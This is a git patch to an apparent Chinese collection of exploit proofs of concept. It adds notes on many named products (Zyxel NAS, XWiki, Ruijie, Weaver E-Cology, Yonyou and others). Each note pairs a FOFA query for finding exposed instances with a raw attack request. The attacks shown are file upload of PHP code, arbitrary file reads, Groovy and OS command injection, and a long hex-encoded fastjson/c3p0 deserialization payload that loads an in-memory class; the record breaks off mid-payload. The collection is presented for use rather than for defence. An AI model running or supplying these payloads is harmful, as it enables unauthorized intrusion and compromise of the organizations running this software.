From 1fed97fd2a85820a276675108ffb41ceeb1923cc Mon Sep 17 00:00:00 2001
From: wy876 <TgsstfA@protonmail.com>
Date: Fri, 21 Jun 2024 20:01:18 +0800
Subject: [PATCH] =?UTF-8?q?6.21=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...�名系统index-uplog.php存在任意文件上传漏洞.md | 53 +++++++++++++++++++
 ...�台 dynamiccontent.properties.xhtml存在RCE漏洞.md |  6 +++
 README.md                                     | 23 ++++++++
 ...�withpath任意文件读取漏洞(CVE-2023-43662).md | 23 ++++++++
 XWiki-Platform远程代码执行漏洞.md             | 23 ++++++++
 ...tCookie未授权命令注入漏洞(CVE-2024-29973).md | 29 ++++++++++
 ...�系统接口ssoToolReport存在远程代码执行漏洞.md | 31 +++++++++++
 ...��火墙后台接口download存在任意文件读取漏洞.md | 30 +++++++++++
 佑友防火墙后台接口maintain存在命令执行漏洞.md | 33 ++++++++++++
 ...�监测预警系统接口UserEdit.aspx存在SQL注入.md | 24 +++++++++
 多客圈子论坛前台SSRF漏洞.md                   | 21 ++++++++
 契约锁电子签章平台add远程命令执行漏洞.md      | 23 ++++++++
 ...�系统GetCalendarContentById存在SQL注入漏洞.md | 39 ++++++++++++++
 平升水库水文监测系统默认密码.md               | 16 ++++++
 ...�系统GetCertificateInfoByStudentId存在SQL注入漏洞.md | 30 +++++++++++
 易天智能eHR管理平台任意用户添加漏洞.md        | 27 ++++++++++
 极企智能办公路由接口jumper.php存在RCE漏洞.md  | 18 +++++++
 ...�OA接口video_file.php存在任意文件读取漏洞.md | 11 ++++
 ...-Cology-KtreeUploadAction任意文件上传漏洞.md | 35 ++++++++++++
 ...��Ufida-ELTextFile.load.d任意文件读取漏洞.md | 22 ++++++++
 ...�国产化开发平台接口preview任意文件读取漏洞.md | 23 ++++++++
 ...��理系统static_convert.php存在远程命令执行漏洞.md | 25 +++++++++
 22 files changed, 565 insertions(+)
 create mode 100644 APP分发签名系统index-uplog.php存在任意文件上传漏洞.md
 create mode 100644 ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662).md
 create mode 100644 XWiki-Platform远程代码执行漏洞.md
 create mode 100644 Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973).md
 create mode 100644 云匣子系统接口ssoToolReport存在远程代码执行漏洞.md
 create mode 100644 佑友防火墙后台接口download存在任意文件读取漏洞.md
 create mode 100644 佑友防火墙后台接口maintain存在命令执行漏洞.md
 create mode 100644 华测监测预警系统接口UserEdit.aspx存在SQL注入.md
 create mode 100644 多客圈子论坛前台SSRF漏洞.md
 create mode 100644 契约锁电子签章平台add远程命令执行漏洞.md
 create mode 100644 学分制系统GetCalendarContentById存在SQL注入漏洞.md
 create mode 100644 平升水库水文监测系统默认密码.md
 create mode 100644 新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞.md
 create mode 100644 易天智能eHR管理平台任意用户添加漏洞.md
 create mode 100644 极企智能办公路由接口jumper.php存在RCE漏洞.md
 create mode 100644 极限OA接口video_file.php存在任意文件读取漏洞.md
 create mode 100644 泛微E-Cology-KtreeUploadAction任意文件上传漏洞.md
 create mode 100644 用友Ufida-ELTextFile.load.d任意文件读取漏洞.md
 create mode 100644 真内控国产化开发平台接口preview任意文件读取漏洞.md
 create mode 100644 锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞.md

diff --git a/APP分发签名系统index-uplog.php存在任意文件上传漏洞.md b/APP分发签名系统index-uplog.php存在任意文件上传漏洞.md
new file mode 100644
index 0000000..66f1890
--- /dev/null
+++ b/APP分发签名系统index-uplog.php存在任意文件上传漏洞.md
@@ -0,0 +1,53 @@
+## APP分发签名系统index-uplog.php存在任意文件上传漏洞
+
+## fofa
+
+```
+"statics/css/swiper.min.css" && "/user/messages/dialog"
+```
+
+## poc
+
+```
+POST /source/pack/upload/2upload/index-uplog.php HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: max-age=0
+Connection: keep-alive
+Content-Length: 290
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfF7NbGp0PAFq8Mkd
+Host: 127.0.0.1
+Origin: http://127.0.0.1
+Referer: http://127.0.0.1/source/pack/upload/2upload/index-uplog.php
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+sec-fetch-user: ?1
+
+------WebKitFormBoundary03rNBzFMIytvpWhy
+Content-Disposition: form-data; name="time"
+
+1-2
+------WebKitFormBoundary03rNBzFMIytvpWhy
+Content-Disposition: form-data; name="app"; filename="1.php"
+Content-Type: image/jpeg
+
+<?php phpinfo();?>
+------WebKitFormBoundary03rNBzFMIytvpWhy--
+```
+
+文件路径
+
+` /source/data/tmp/1-2.php`
+
+![image-20240621195533293](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211955382.png)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/hCQnGoV4J-4-g_oEjmheGg
\ No newline at end of file
diff --git a/H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞.md b/H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞.md
index 367ab2e..7075255 100644
--- a/H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞.md	
+++ b/H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞.md	
@@ -1,7 +1,13 @@
 ## H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞
 
+## fofa
+
+```
+fid="tPmVs5PL6e9m5Xt0J4V2+A=="
+```
 
 ## poc
+
 ```
 POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
 Host: 127.0.0.1
diff --git a/README.md b/README.md
index fdfd312..7221b37 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,28 @@
 # 漏洞收集
 收集整理漏洞EXP/POC,大部分漏洞来源网络，目前收集整理了600多个poc/exp，善用CTRL+F搜索
 
+## 2024.06.21 新增漏洞
+
+- 真内控国产化开发平台接口preview任意文件读取漏洞
+- 华测监测预警系统接口UserEdit.aspx存在SQL注入
+- ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662)
+- 契约锁电子签章平台add远程命令执行漏洞
+- Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973)
+- 新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞
+- XWiki-Platform远程代码执行漏洞
+- 学分制系统GetCalendarContentById存在SQL注入漏洞
+- 云匣子系统接口ssoToolReport存在远程代码执行漏洞
+- 泛微E-Cology-KtreeUploadAction任意文件上传漏洞
+- 极限OA接口video_file.php存在任意文件读取漏洞
+- 锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞
+- 佑友防火墙后台接口download存在任意文件读取漏洞
+- 佑友防火墙后台接口maintain存在命令执行漏洞
+- 极企智能办公路由接口jumper.php存在RCE漏洞
+- 用友Ufida-ELTextFile.load.d任意文件读取漏洞
+- 易天智能eHR管理平台任意用户添加漏洞
+- 多客圈子论坛前台SSRF漏洞
+- APP分发签名系统index-uplog.php存在任意文件上传漏洞
+
 ## 2024.06.18 新增漏洞
 
 - 禅道18.5存在后台命令执行漏洞
@@ -13,6 +35,7 @@
 - 致远互联FE协作办公平台ncsubjass存在SQL注入
 - 世邦通信SPON-IP网络对讲广播系统my_parser.php任意文件上传漏洞
 - 万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞
+- 平升水库水文监测系统默认密码
 
 ## 2024.06.14 新增漏洞
 
diff --git a/ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662).md b/ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662).md
new file mode 100644
index 0000000..ea15d67
--- /dev/null
+++ b/ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662).md
@@ -0,0 +1,23 @@
+## ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662)
+
+ShokoServer /api/Image/withpath/接口处存在任意文件读取漏洞，未经身份验证得攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```
+title="Shoko WEB UI"
+```
+
+## poc
+
+```
+GET /api/Image/withpath/C:\Windows\win.ini HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![image-20240621183622365](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211836419.png)
\ No newline at end of file
diff --git a/XWiki-Platform远程代码执行漏洞.md b/XWiki-Platform远程代码执行漏洞.md
new file mode 100644
index 0000000..1e381c7
--- /dev/null
+++ b/XWiki-Platform远程代码执行漏洞.md
@@ -0,0 +1,23 @@
+## XWiki-Platform远程代码执行漏洞
+
+XWiki 的数据库搜索允许通过搜索文本远程执行代码。这允许公共 wiki 的任何访问者或封闭 wiki 的用户远程执行代码，因为默认情况下所有用户都可以访问数据库搜索。这会影响整个 XWiki 安装的机密性、完整性和可用性。
+
+## fofa
+
+```
+body="data-xwiki-reference"
+```
+
+## poc
+
+```
+GET /xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22MiTian%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%288888%20%2B%206666%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)
+```
+
+![image-20240621185205531](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211852577.png)
+
+## 漏洞来源
+
+- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2858-8cfx-69m9
\ No newline at end of file
diff --git a/Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973).md b/Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973).md
new file mode 100644
index 0000000..7d77384
--- /dev/null
+++ b/Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973).md
@@ -0,0 +1,29 @@
+## Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973)
+
+Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞，该漏洞源于setCookie参数中存在命令注入漏洞，从而导致未经身份验证的远程攻击者可通过HTTP POST请求来执行某些操作系统 (OS) 命令。
+
+## fofa
+
+```
+body="/cmd,/ck6fup6/user_grp_cgi/cgi_modify_userinfo"
+```
+
+## poc
+
+```
+POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6
+ 
+------WebKitFormBoundaryHHaZAYecVOf5sfa6
+Content-Disposition: form-data; name="c0"
+ 
+storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#
+------WebKitFormBoundaryHHaZAYecVOf5sfa6--
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211838104.png)
\ No newline at end of file
diff --git a/云匣子系统接口ssoToolReport存在远程代码执行漏洞.md b/云匣子系统接口ssoToolReport存在远程代码执行漏洞.md
new file mode 100644
index 0000000..cd171bf
--- /dev/null
+++ b/云匣子系统接口ssoToolReport存在远程代码执行漏洞.md
@@ -0,0 +1,31 @@
+## 云匣子系统接口ssoToolReport存在远程代码执行漏洞
+
+云匣子管理系统某接口存在一个fastjson反序列化漏洞，使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令，严重威胁系统的机密性和完整性。
+
+## fofa
+
+```
+app="云安宝-云匣子"
+```
+
+## poc
+
+```
+
+POST /3.0/authService/ssoToolReport HTTP/2
+Host: 
+Accept: application/json, text/plain, */*
+Content-Type: application/json;charset=UTF-8
+Origin: https://
+Referer: https://
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36
+Cmd: whoami
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Priority: u=1, i
+Content-Length: 18907
+
+{"a":{"@type":"java.lang.Class","val": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"b":{"@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200206a617661782e7363726970742e536372697074456e67696e654d616e61676572000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000b6e6577496e7374616e6365757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007371007e00137571007e0018000000017400026a7374000f676574456e67696e6542794e616d657571007e001b00000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e00180000000174202b747279207b0a20206c6f616428226e6173686f726e3a6d6f7a696c6c615f636f6d7061742e6a7322293b0a7d20636174636820286529207b7d0a66756e6374696f6e20676574556e7361666528297b0a202076617220746865556e736166654d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e556e7361666522292e6765744465636c617265644669656c642827746865556e7361666527293b0a2020746865556e736166654d6574686f642e73657441636365737369626c652874727565293b200a202072657475726e20746865556e736166654d6574686f642e676574286e756c6c293b0a7d0a66756e6374696f6e2072656d6f7665436c617373436163686528636c617a7a297b0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617a7a416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c61737328636c617a7a2c6a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c61737322292e6765745265736f75726365417353747265616d2822436c6173732e636c61737322292e72656164416c6c427974657328292c6e756c6c293b0a2020766172207265666c656374696f6e446174614669656c64203d20636c617a7a416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428227265666c656374696f6e4461746122293b0a2020756e736166652e7075744f626a65637428636c617a7a2c756e736166652e6f626a6563744669656c644f6666736574287265666c656374696f6e446174614669656c64292c6e756c6c293b0a7d0a66756e6374696f6e206279706173735265666c656374696f6e46696c7465722829207b0a2020766172207265666c656374696f6e436c6173733b0a2020747279207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a646b2e696e7465726e616c2e7265666c6563742e5265666c656374696f6e22293b0a20207d20636174636820286572726f7229207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e7265666c6563742e5265666c656374696f6e22293b0a20207d0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617373427566666572203d207265666c656374696f6e436c6173732e6765745265736f75726365417353747265616d28225265666c656374696f6e2e636c61737322292e72656164416c6c427974657328293b0a2020766172207265666c656374696f6e416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c617373287265666c656374696f6e436c6173732c20636c6173734275666665722c206e756c6c293b0a2020766172206669656c6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226669656c6446696c7465724d617022293b0a2020766172206d6574686f6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226d6574686f6446696c7465724d617022293b0a2020696620286669656c6446696c7465724d61704669656c642e6765745479706528292e697341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286669656c6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a2020696620286d6574686f6446696c7465724d61704669656c642e6765745479706528292e697341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286d6574686f6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a202072656d6f7665436c6173734361636865286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c6173732229293b0a7d0a66756e6374696f6e2073657441636365737369626c652861636365737369626c654f626a656374297b0a2020202076617220756e73616665203d20676574556e7361666528293b0a20202020766172206f766572726964654669656c64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e7265666c6563742e41636365737369626c654f626a65637422292e6765744465636c617265644669656c6428226f7665727269646522293b0a20202020766172206f6666736574203d20756e736166652e6f626a6563744669656c644f6666736574286f766572726964654669656c64293b0a20202020756e736166652e707574426f6f6c65616e2861636365737369626c654f626a6563742c206f66667365742c2074727565293b0a7d0a66756e6374696f6e20646566696e65436c617373286279746573297b0a202076617220636c7a203d206e756c6c3b0a20207661722076657273696f6e203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226a6176612e76657273696f6e22293b0a202076617220756e73616665203d20676574556e7361666528290a202076617220636c6173734c6f61646572203d206e6577206a6176612e6e65742e55524c436c6173734c6f61646572286a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6e65742e55524c22292c203029293b0a20207472797b0a202020206966202876657273696f6e2e73706c697428222e22295b305d203e3d20313129207b0a2020202020206279706173735265666c656374696f6e46696c74657228293b0a20202020646566696e65436c6173734d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c6173734c6f6164657222292e6765744465636c617265644d6574686f642822646566696e65436c617373222c206a6176612e6c616e672e436c6173732e666f724e616d6528225b4222292c6a6176612e6c616e672e496e74656765722e545950452c206a6176612e6c616e672e496e74656765722e54595045293b0a2020202073657441636365737369626c6528646566696e65436c6173734d6574686f64293b0a202020202f2f20e7bb95e8bf872073657441636365737369626c65200a20202020636c7a203d20646566696e65436c6173734d6574686f642e696e766f6b6528636c6173734c6f616465722c2062797465732c20302c2062797465732e6c656e677468293b0a202020207d656c73657b0a2020202020207661722070726f74656374696f6e446f6d61696e203d206e6577206a6176612e73656375726974792e50726f74656374696f6e446f6d61696e286e6577206a6176612e73656375726974792e436f6465536f75726365286e756c6c2c206a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e73656375726974792e636572742e436572746966696361746522292c203029292c206e756c6c2c20636c6173734c6f616465722c205b5d293b0a202020202020636c7a203d20756e736166652e646566696e65436c617373286e756c6c2c2062797465732c20302c2062797465732e6c656e6774682c20636c6173734c6f616465722c2070726f74656374696f6e446f6d61696e293b0a202020207d0a20207d6361746368286572726f72297b0a202020206572726f722e7072696e74537461636b547261636528293b0a20207d66696e616c6c797b0a2020202072657475726e20636c7a3b0a20207d0a7d0a66756e6374696f6e206261736536344465636f6465546f427974652873747229207b0a20207661722062743b0a20207472797b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e4241534536344465636f64657222292e6e6577496e7374616e636528292e6465636f646542756666657228737472293b0a20207d63617463682865297b7d0a2020696620286274203d3d206e756c6c297b0a202020207472797b0a2020202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e42617365363422292e6e6577496e7374616e636528292e6765744465636f64657228292e6465636f646528737472293b0a202020207d63617463682865297b7d0a20207d0a2020696620286274203d3d206e756c6c297b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226f72672e6170616368652e636f6d6d6f6e732e636f6465632e62696e6172792e42617365363422292e6e6577496e7374616e636528292e6465636f646528737472290a20207d0a202072657475726e2062743b0a7d0a76617220636f64653d2279763636766741414144494177516f41435142524367425341464d4b414649415641674156516f4156674258434142594277425a4367414841466f484146734b41467741585167415867674158776741594167415951674159676f414277426a4341426b4341426c4277426d43674263414763494147674b4144304161516f41435142714341427243414273434142744341427543674154414738494148414b4148454163676f414577427a43674154414851494148554b41424d4164676741647767416541634165516f414a5142524367416c41486f494148734b414355416641674166516741666767416677674167416f41675143434367434241494d484149514b4149554168676f414d414348434143494367417741496b4b4144414169676f414d41434c436743464149774b414955416a5163416a676f414f5142384341435043674139414a4148414a454241415938615735706444344241414d6f4b565942414152446232526c4151415054476c755a55353162574a6c636c5268596d786c4151414c614746755a464a6c6358566c633351424141704665474e6c634852706232357a415141455a58686c597745414a69684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576624746755a79395464484a70626d63374151414e553352685932744e5958425559574a735a5163415a6763416b6763416b77634168416341655163416a6763416c4145414344786a62476c756158512b4151414b55323931636d4e6c526d6c735a51454143464e464d53357159585a684441412b41443848414a554d414a59416c7777416d41435a4151413862334a6e4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4a6c6358566c63335244623235305a586830534739735a4756794277436144414362414a77424142526e5a5852535a5846315a584e3051585230636d6c696458526c6377454144327068646d4576624746755a7939446247467a637777416e51436541514151616d4632595339735957356e4c303969616d566a644163416e7777416f4143684151424162334a6e4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4e6c636e5a735a5852535a5846315a584e3051585230636d6c696458526c637745414332646c64464a6c63334276626e4e6c4151414b5a325630556d56786457567a6441454148577068646d46344c6e4e6c636e5a735a58517555325679646d786c64464a6c63334276626e4e6c4151414a5a32563056334a706447567944414369414a34424143567159585a686543357a5a584a32624756304c6d6830644841755348523063464e6c636e5a735a5852535a5846315a584e304151414a5a325630534756685a47567941514151616d4632595339735957356e4c314e30636d6c755a7777416f77436b415141445932316b444142454145554d414b5541706745414233427961573530624734424141566d6248567a6141454142574e7362334e6c415141414441436e414b674241416476637935755957316c42774370444143714145554d414b734172417741725143734151414464326c7544414375414b3842414152776157356e415141434c5734424142647159585a684c327868626d6376553352796157356e516e56706247526c636777417341437841514146494331754944514d414c4941724145414169396a41514146494331304944514241414a7a614145414169316a4277437a44414330414c554d414551417467454145577068646d4576645852706243395459324675626d56794277435344414333414c674d4144344175514541416c786844414336414c734d414c774176517741766743734441432f414c674d414d41415077454145327068646d4576624746755a79394665474e6c63485270623234424142426a623231745957356b494735766443427564577873444142434144384241414e54525445424142467159585a684c327868626d637655484a765932567a637745414531744d616d4632595339735957356e4c314e30636d6c755a7a734241424e7159585a684c327868626d63765647687962336468596d786c41514151616d4632595339735957356e4c31526f636d56685a41454144574e31636e4a6c626e525561484a6c595751424142516f4b55787159585a684c327868626d6376564768795a57466b4f7745414657646c64454e76626e526c654852446247467a633078765957526c636745414753677054477068646d4576624746755a7939446247467a633078765957526c636a73424142567159585a684c327868626d63765132786863334e4d6232466b5a58494241416c736232466b5132786863334d424143556f54477068646d4576624746755a79395464484a70626d63374b55787159585a684c327868626d63765132786863334d374151414a5a325630545756306147396b415142414b45787159585a684c327868626d6376553352796157356e4f31744d616d4632595339735957356e4c304e7359584e7a4f796c4d616d4632595339735957356e4c334a6c5a6d786c59335176545756306147396b4f77454147477068646d4576624746755a7939795a575a735a574e304c30316c644768765a414541426d6c75646d39725a5145414f53684d616d4632595339735957356e4c303969616d566a6444746254477068646d4576624746755a793950596d706c593351374b55787159585a684c327868626d637654324a715a574e304f7745414557646c6445526c59327868636d566b545756306147396b4151414e6332563051574e6a5a584e7a61574a735a514541424368614b5659424141686e5a5852446247467a637745414579677054477068646d4576624746755a7939446247467a637a734241415a6c6358566862484d424142556f54477068646d4576624746755a793950596d706c593351374b566f424142427159585a684c327868626d637655336c7a644756744151414c5a32563055484a766347567964486b424141743062307876643256795132467a5a5145414643677054477068646d4576624746755a79395464484a70626d63374151414564484a706251454143474e76626e52686157357a415141624b45787159585a684c327868626d637651326868636c4e6c6358566c626d4e6c4f796c6141514147595842775a57356b415141744b45787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c314e30636d6c755a304a316157786b5a584937415141496447395464484a70626d63424142467159585a684c327868626d6376556e567564476c745a514541436d646c64464a31626e5270625755424142556f4b55787159585a684c327868626d6376556e567564476c745a5473424143676f5730787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c31427962324e6c63334d374151414f5a325630535735776458525464484a6c595730424142636f4b55787159585a684c326c764c306c7563485630553352795a5746744f7745414743684d616d4632595339706279394a626e423164464e30636d566862547370566745414448567a5a55526c62476c746158526c636745414a79684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576645852706243395459324675626d56794f774541423268686330356c6548514241414d6f4b566f42414152755a5868304151414f5a32563052584a7962334a5464484a6c595730424141646b5a584e30636d3935414345415051414a4141414141414145414145415067412f4141454151414141414230414151414241414141425371334141477841414141415142424141414142674142414141414541414a41454941507741434145414141414679414159414377414141524b3441414b3241414d53424c594142557371456759447651414874674149544373424137304143625941436b323441414b3241414d53433759414255737145677744765141487467414954436f5344514f39414165324141684f4b7977447651414a7467414b4f6751744c414f3941416d3241416f3642626741417259414178494f746741464567384476514148746741514f67613441414b3241414d534562594142524953424c304142316b4445684e54746741514f67635a427753324142515a426753324142515a42686b454137304143625941436a6f494751635a4251533941416c5a417849565537594143734141457a6f4a47516d344142593643686b4974674158456867457651414857514d5345314f324142415a4341533941416c5a41786b4b55375941436c635a434c59414678495a413730414237594145426b494137304143625941436c635a434c594146784961413730414237594145426b494137304143625941436c657841414141415142424141414154674154414141414577414d41425141467741564143454146674174414263414f41415941454d414751424f41426f4157514162414738414841434b414230416b414165414a59414877436a4143414175414168414c38414967446841434d412b51416b415245414a514244414141414241414241446b41435142454145554141514241414141436e41414541416741414145324b7359424d6849624b725941484a6f424b5249647541416574674166544371324143424c41553042546973534962594149706b4150796f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456969324143653241436c4c4272304145316b4445685654575151534b6c4e5a425370545471634150436f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456975324143653241436c4c4272304145316b4445697854575151534c564e5a42537054547267414c6932324143394e757741775753793241444733414449534d3759414e446f45475153324144575a4141735a424c59414e716341425249624f6757374144425a4c4c59414e3763414d68497a746741304f6753374143565a7477416d475157324143635a424c59414e5a6b4143786b457467413270774146456875324143653241436b3642526b464f675973786741484c4c59414f426b4773446f454751533241446f3642537a4741